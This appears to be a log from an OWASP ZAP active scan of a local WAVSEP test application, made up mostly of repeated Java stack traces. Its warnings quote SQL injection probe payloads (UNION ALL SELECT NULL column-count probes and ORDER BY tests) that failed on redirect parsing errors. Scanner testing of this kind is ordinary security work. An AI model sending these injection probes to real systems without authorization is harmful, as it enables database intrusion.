java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688477 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688479 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688481 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688483 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688483 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688492 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688493 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688498 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688502 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688503 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 3841#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' ORDER BY 3841# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688506 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688507 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688508 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 